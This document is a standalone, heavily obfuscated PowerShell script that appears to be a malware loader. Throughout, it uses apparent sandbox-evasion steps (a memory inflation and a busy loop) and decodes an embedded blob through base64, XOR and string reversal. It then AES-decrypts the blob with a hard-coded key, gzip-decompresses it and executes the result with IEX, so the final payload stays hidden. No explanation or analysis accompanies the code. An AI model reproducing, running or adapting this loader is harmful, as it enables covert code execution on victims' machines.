$tzhgpzmxopx = (Get-Process -Id $PID | Select-Object Name,@{Name="WorkingSet";Expression={($_.ws / 1024kb)}}).WorkingSet
if ($tzhgpzmxopx -lt 250) { $ysjyyjgxnzrvjjq = "a" * 300MB }
$iqqyzvkwjykkzzx = 0
$yzvniqzrqu = 30000000
For ($iqqyzvkwjykkzzx=0; $iqqyzvkwjykkzzx -lt $yzvniqzrqu;$iqqyzvkwjykkzzx++) { $iqqyzvkwjykkzzx++ }
$wzgigmpmiu = [System.Text.Encoding]::UTF8.GetBytes("txixtzuvzoz")
$xktyrpwzksvjgv = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("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"))
$qnpoktwgrh = [System.Text.Encoding]::UTF8.GetBytes($xktyrpwzksvjgv)
$mwxnkmropi = $(for ($rgohutxgyz = 0; $rgohutxgyz -lt $qnpoktwgrh.length; ) {
    for ($ksinsxsphqzo = 0; $ksinsxsphqzo -lt $wzgigmpmiu.length; $ksinsxsphqzo++) {
        $qnpoktwgrh[$rgohutxgyz] -bxor $wzgigmpmiu[$ksinsxsphqzo]
        $rgohutxgyz++
        if ($rgohutxgyz -ge $qnpoktwgrh.Length) {
            $ksinsxsphqzo = $wzgigmpmiu.length
        }
    }
})
$mwxnkmropi = [System.Text.Encoding]::UTF8.GetString($mwxnkmropi)
$yiznxyoxnxjty = "$mwxnkmropi"
$utvqvuqskuoqi = $yiznxyoxnxjty.ToCharArray()
[array]::Reverse($utvqvuqskuoqi)
$tiuuosnoourgk = -join($utvqvuqskuoqi)
$uiutkpksyp = [System.Convert]::FromBase64String("$tiuuosnoourgk")
$qrmqznpkjwznqh = [System.Convert]::FromBase64String("p7U7xHMhFNxt0NRVAofP8OikzNCXGAZdrNhq21e5sJc=")
$jrihmkiixwot = "==gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U"
$nwwuzqjngs = $jrihmkiixwot.ToCharArray()
[array]::Reverse($nwwuzqjngs)
$vpmorxskizpotyxpq = -join($nwwuzqjngs)
$yhwxizgtspjnrr = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vpmorxskizpotyxpq))
$ihoroxhwni = New-Object "$yhwxizgtspjnrr"
$vvmigrsmrjtnu = "==gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"
$nykqwkrpjzvjsjqq = $vvmigrsmrjtnu.ToCharArray()
[array]::Reverse($nykqwkrpjzvjsjqq)
$jotoypzhgtrsxxh = -join($nykqwkrpjzvjsjqq)
$ojgpmvnuzvy = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($jotoypzhgtrsxxh))
$zngiuuttyvphh = & ([scriptblock]::Create($ojgpmvnuzvy))
$ihoroxhwni.Mode = $zngiuuttyvphh
$kxnvrpjhmujnpu = "==wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"
$xyhgtqhyjsn = $kxnvrpjhmujnpu.ToCharArray()
[array]::Reverse($xyhgtqhyjsn)
$voxogiososqnv = -join($xyhgtqhyjsn)
$sikstpnkpgkw = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($voxogiososqnv))
$yuzkhuxxiikyppjt = & ([scriptblock]::Create($sikstpnkpgkw))
$ihoroxhwni.Padding = $yuzkhuxxiikyppjt
$ihoroxhwni.BlockSize = 128
$ihoroxhwni.KeySize = 256
$ihoroxhwni.Key = $qrmqznpkjwznqh
$ihoroxhwni.IV = $uiutkpksyp[0..15]
$hqwnyrruwmyu = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLk1lbW9yeVN0cmVhbQ=="))
$mrsmgjjzqnmurjp = New-Object $hqwnyrruwmyu(,$ihoroxhwni.CreateDecryptor().TransformFinalBlock($uiutkpksyp,16,$uiutkpksyp.Length-16))
$kuivxsmurrwnvqnrz = New-Object $hqwnyrruwmyu
$sisphkyiyxothku = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("RGVjb21wcmVzcw=="))
$qqmomumgtuhsxp = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV0="))))
$iwpuxyowsriw = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLkNvbXByZXNzaW9uLkd6aXBTdHJlYW0="))
$wotnrhvrpvrnxxynk = New-Object $iwpuxyowsriw $mrsmgjjzqnmurjp, ($qqmomumgtuhsxp::$sisphkyiyxothku)
$wotnrhvrpvrnxxynk.CopyTo($kuivxsmurrwnvqnrz)
$wotnrhvrpvrnxxynk.Close()
$ihoroxhwni.Dispose()
$mrsmgjjzqnmurjp.Close()
$wiginovxnx = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5UZXh0LkVuY29kaW5nXQ=="))))
$thmqxoskxmjupz = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VVRGOA=="))
$gqzppsyrjxuy = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VG9BcnJheQ=="))
$kwkomxxgxonuzr = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("R2V0U3RyaW5n"))
$oytouqiwhvkzrjn = $wiginovxnx::$thmqxoskxmjupz.$kwkomxxgxonuzr($kuivxsmurrwnvqnrz.$gqzppsyrjxuy())
IEX($oytouqiwhvkzrjn)
